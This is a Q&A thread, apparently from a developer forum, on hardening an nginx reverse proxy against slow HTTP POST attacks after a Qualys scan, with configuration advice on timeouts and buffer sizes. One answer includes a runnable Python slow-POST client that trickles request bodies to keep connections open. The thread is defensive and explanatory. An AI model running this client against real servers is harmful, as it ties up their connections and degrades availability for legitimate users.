Slow HTTP POST attack in Nginx


To check for vulnerabilities in our app servers, we ran a Qualys scan. The report found our app servers vulnerable to slow HTTP POST attacks. To mitigate this, we configured nginx in front of the app servers based on Qualys' recommendations (https://blog.qualys.com/securitylabs/2011/11/02/how-to-protect-against-slow-http-attacks). According to Qualys, if a server keeps a connection open for more than 120 seconds, they consider it vulnerable to a slow HTTP POST attack. Even though nginx's default timeout is 60s, it keeps the connection open for more than 2 minutes on our app server. We also checked the nginx connection status: the connection stays in the writing state for more than 2 minutes.

Please help us configure nginx to prevent slow HTTP POST attacks.
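For reference, connection states like the "writing" state mentioned above can be read from nginx's stub_status module (assuming nginx was built with ngx_http_stub_status_module; the location path below is arbitrary):

```nginx
location /nginx_status {
    stub_status;         # reports Active, Reading, Writing, Waiting counters
    allow 127.0.0.1;     # restrict to localhost
    deny all;
}
```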

Current nginx Configuration

user nginx;
worker_processes auto; 
worker_rlimit_nofile 102400; 

events {
    worker_connections 100000; 
}

access_log off;  
autoindex off;
limit_req_zone $binary_remote_addr zone=req_limit_per_ip:10m rate=2r/s;   
limit_conn_zone $binary_remote_addr zone=limitzone:10m;  
limit_conn_status 403;   
limit_req_status 403;
sendfile on; 
tcp_nopush on; 
tcp_nodelay on; 
keepalive_timeout 20 15; 
client_body_timeout 5s;  
client_header_timeout 5s;  
send_timeout 2;  
reset_timedout_connection on;   
types_hash_max_size 2048;  
server_tokens off;
client_body_buffer_size 100K;  
client_header_buffer_size 1k;  
client_max_body_size 100k;  
large_client_header_buffers 2 1k;

include /etc/nginx/mime.types;
default_type application/octet-stream;

upstream backend {   
    server 127.0.0.1:8080 max_conns=150;   
}

server {  
    listen 443 ssl http2 default_server;
    # listen [::]:443 ssl http2 default_server;
    server_name *******;
    underscores_in_headers on;

    if ($request_method !~ ^(GET|HEAD|POST|PUT|DELETE)$ ) {
        return 444;
    }

    *** ssl configuration ***
        .....

    location / {  
        limit_conn limitzone 20; 
        limit_req zone=req_limit_per_ip burst=5 nodelay; 
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;   
        proxy_cookie_path / "/; HTTPOnly; Secure; SameSite=strict";   
        proxy_set_header X-Real-IP $remote_addr;  
        proxy_set_header X-Forwarded-Proto https; 
        proxy_pass http://backend;
    }
}

There are 2 best solutions below


From the NGINX docs for client_body_timeout

The timeout is set only for a period between two successive read operations, not for the transmission of the whole request body. If a client does not transmit anything within this time, the request is terminated with the 408 (Request Time-out) error.

(emphasis mine)

I read that as: Qualys might be able to keep the connection open by sending a small chunk of the body just before each timeout window expires (with your client_body_timeout of 5s, say every 4 seconds), resetting the timer each time while keeping the connection open well past 120 seconds.

I'm not aware of an nginx directive that limits the transmission time of the whole request body.
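To illustrate the point, here is a hedged sketch (not Qualys' actual tool) of a slow-POST client that trickles the request body one byte at a time, pausing just under client_body_timeout between writes; the host, port, and 4-second interval are illustrative assumptions:

```python
import socket
import time

def build_request(host, body_len):
    """Headers for a POST whose Content-Length promises far more
    data than the client intends to send quickly."""
    return (
        "POST / HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Content-Length: {body_len}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        "\r\n"
    ).encode()

def slow_post(host, port, body_len=1000, interval=4.0, duration=130.0):
    """Send one body byte every `interval` seconds for up to `duration`
    seconds. With client_body_timeout 5s, each write arrives inside the
    timeout window and resets the timer, so the connection can stay open
    past Qualys' 120-second threshold. Returns bytes of body sent."""
    sock = socket.create_connection((host, port))
    sock.sendall(build_request(host, body_len))
    deadline = time.monotonic() + duration
    sent = 0
    while time.monotonic() < deadline and sent < body_len:
        sock.sendall(b"x")   # one byte is enough to reset client_body_timeout
        sent += 1
        time.sleep(interval)
    sock.close()
    return sent
```

If a probe like this holds the connection past 120 seconds, the scanner flags the server regardless of the configured per-read timeouts.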


Unless you run a very popular site, several of these settings are set far too high for a new deployment. You can always raise them later, after the site goes live.

1) worker_rlimit_nofile 102400

I am not sure how much memory your server has, but this number seems too large. I would suggest something like:

worker_rlimit_nofile 8192;

2) worker_connections 100000

worker_processes and worker_connections are generally configured based on the number of CPU cores, the content served, and the load. The formula for the upper bound is max_clients = worker_processes * worker_connections. worker_connections does not need to be 100000; the nginx default is only 1024. With 4 CPU cores, nginx could then hold 1024 x 4 = 4096 simultaneous clients.
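As a back-of-the-envelope check of the formula above (the 4-core figure is just the example from this answer, and each proxied request may in practice consume two connections, one client-side and one upstream-side):

```python
def max_clients(worker_processes, worker_connections):
    """Upper bound on simultaneous client connections nginx can hold."""
    return worker_processes * worker_connections

print(max_clients(4, 1024))  # 4 workers x 1024 connections -> 4096
```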

I would also suggest adding multi_accept on;, which tells each worker process to accept all new connections at once, as opposed to accepting one new connection at a time.

events {
    worker_connections 1024;
    multi_accept on;
}

3) Client body and header size

One of the recommendations for preventing slow HTTP attacks is to set client_max_body_size, client_body_buffer_size, client_header_buffer_size, and large_client_header_buffers reasonably small, increasing them only where necessary. But you may have set these directives so low that they hurt server performance; I would recommend starting from the defaults of the nginx http core module for now:

client_header_buffer_size 1k;
client_body_buffer_size 16k;    # 8k for 32-bit or 16k for 64-bit platform
client_max_body_size 1m;
large_client_header_buffers 4 8k;

BTW, as a best practice, all of these basic settings should be wrapped in an http block so that they apply to all HTTP traffic. I would also recommend enabling the access log, as it is very useful for understanding the traffic (and attacks) during the early stage of a server deployment.

http {
    access_log /var/log/nginx/access.log;
    autoindex off;

    # other settings

    .....

    upstream backend {   
        server 127.0.0.1:8080 max_conns=150;   
    }
}